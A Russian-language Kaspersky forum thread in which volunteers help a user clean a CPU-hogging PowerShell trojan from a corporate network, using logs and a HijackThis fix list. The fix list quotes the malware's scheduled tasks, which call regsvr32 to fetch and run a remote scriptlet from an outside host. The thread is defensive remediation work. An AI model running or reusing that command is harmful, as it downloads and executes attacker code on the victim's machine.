Перейти к содержанию
Правила раздела
19 лет клубу! Встречаемся в офисе «Лаборатории Касперского»

троян powershall разлетелся по сети

Максим Павельев

Автор Максим Павельев
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Максим Павельев

Максим Павельев

Опубликовано
Опубликовано

Добрый день.

Троян powershell.exe разлетелся по всей корпоративной сети( нагружает ЦП до 100% и делает работу ПК невозможной.

удалил его dr.web Cureit, но он снова появляется.

помогите пожалуйста

есть ли какое лекарство что бы убрать его со всех ПК?
 

Ссылка на комментарий
Поделиться на другие сайты
  • Ответов 37
  • Создана
  • Последний ответ

Топ авторов темы

  • Максим Павельев

    19

  • Sandor

    17

  • regist

    2

Популярные дни

Топ авторов темы

Популярные дни

Популярные посты

Sandor
Sandor

Здесь больше ничего плохого не видно.   Проверьте уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе Запустите двойным щелчком мыши (если Вы и

Sandor
Sandor

Всё найденное можно удалить (поместить в карантин).

Sandor
Sandor

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запусти

Изображения в теме

Sandor

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Вам известны правила этой ветки форума. Если нужно только обсудить способ, сообщите и перенесем в другую.

Ссылка на комментарий
Поделиться на другие сайты
Максим Павельев

Максим Павельев

Опубликовано
  • Автор
Опубликовано

Здравствуйте!

 

Вам известны правила этой ветки форума. Если нужно только обсудить способ, сообщите и перенесем в другую.

извините пожалуйста.

почему то не прикрепился лог.

да, мне нужен способ и уничтожения вируса.

спасибо

CollectionLog-2019.01.28-14.41.zip

Ссылка на комментарий
Поделиться на другие сайты
Sandor

Sandor

Опубликовано
Опубликовано

"Пофиксите" в HijackThis:

O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: System Log Security Check - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O22 - Task: Upd7Live - C:\Windows\Upd7Live.exe /exec=DevCon (file missing)
O22 - Task: WindowsLogTasks - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1
Перезагрузите компьютер вручную и соберите свежий CollectionLog.
Ссылка на комментарий
Поделиться на другие сайты
Sandor

Sandor

Опубликовано
Опубликовано

Здесь больше ничего плохого не видно.

 

Проверьте уязвимые места:

  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
Если нужно проверить другой компьютер, создайте для него отдельную тему.
  • Спасибо (+1) 1
Ссылка на комментарий
Поделиться на другие сайты
Максим Павельев

Максим Павельев

Опубликовано
  • Автор
Опубликовано

@Sandor, скажите, у меня все это разошлось по всем ПК в сети, это примерно 50 штук. Нужно каждый ручками теперь зачищать?

Ссылка на комментарий
Поделиться на другие сайты
Sandor

Sandor

Опубликовано
Опубликовано

Это не универсальное решение. Фикс написан только для указанного компьютера.

Давайте посмотрим еще пару компьютеров с похожими симптомами, далее будет понятно как действовать.

Смотрите также настройки вашего антивируса - почему это произошло и т.д.

Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано

 

 


что бы вы путались)
путаница это когда в одной теме логи с разных систем.

 

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:

  1. Запустите AVZ.
  2. Запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  3. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  4. Закачайте полученный архив, как описано на этой странице.
  5. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: Яндекс.Диск, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.


 

PS. эта процедура универсальная, так что желательно это проделать и на остальных.

Ссылка на комментарий
Поделиться на другие сайты
Максим Павельев

Максим Павельев

Опубликовано
  • Автор
Опубликовано

 

Проверьте уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе

Это сделайте.

 

выполнил

SecurityCheck.txt

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • varzi_73
      Троян trojan.multi.aum
      Автор varzi_73
      Добрый день! подцепил троян. Как восстановить данные?
      RDesk_Backup.rar
    • MirTa
      Троян ISTANBULTEAM зашифровал файлы
      Автор MirTa
      Здравствуйте, вчера в два этапа  10.00 и  20.00 оказались зашифрованы почти все файлы, в том числе и архиватор, поэтому не могу сложить в архив и не могу их прикрепить, подскажите, пожалуйста, как их сюда добавить
      Important_Notice.txt Addition.txt FRST.txt
    • user344
      Поймал майнер или троян
      Автор user344
      Здравствуйте! Недавно компьютер в простое начинает переодически нагружаться до 100%, вентиляторы начинают крутить на полную в течении 5-10 минут, только начинаешь водить мышкой по рабочему столу, то сразу же нагрузка падает до дефолтных значений. Проверял лечащай утилитой др.веб и kvrt они вирусов не нашли.
      CollectionLog-2025.06.25-21.11.zip
    • DonorRaboti
      [РЕШЕНО] Подозрение на троян Trojan:Win32/Wacatac.B!ml
      Автор DonorRaboti
      Добрый день, по своей глупости скачал файл exe и запустил его после чего на компьютере появились рекламные ярлыки на рабочем столе и как будто часть сайтов с антивирусным по затормозились. Сканировал Dr.Web CureIt и KVRT, но ничего не было найдено того, что ранее не видел. Возможно, видел новый созданный профиль в Windows, подписанный как неизвестный или что-то такое и удалил его. Проверки Антивирусами ничего не выявляли, кроме пары файлов в корзине. Сам компьютер, как мне показалось, иногда подвисал, словно был загружен, но в диспетчере задач, как и в resmon ничего не выявил. На VirusTotal при проверке файла указывало на вредоносное ПО, содержащее Trojan:Win32/Wacatac.B!ml. Также заметил, что не могу попасть на сайт safezone.cc, скачивал автологер через 2 зеркало
      CollectionLog-2025.06.19-02.13.zip
    • Wgis
      Троян HEUR/AGEN.1374183
      Автор Wgis
      Добрый день, поймали такой вирус: https://www.virustotal.com/gui/file/55d05771086c5acc0c6275be9e1366819b5bb941a1bfb85ea4a1721ce6486a85/
       
      Помогите пожалуйста с лечением, вот отчёты FRST:
       
      frst.zip
×
×
  • Создать...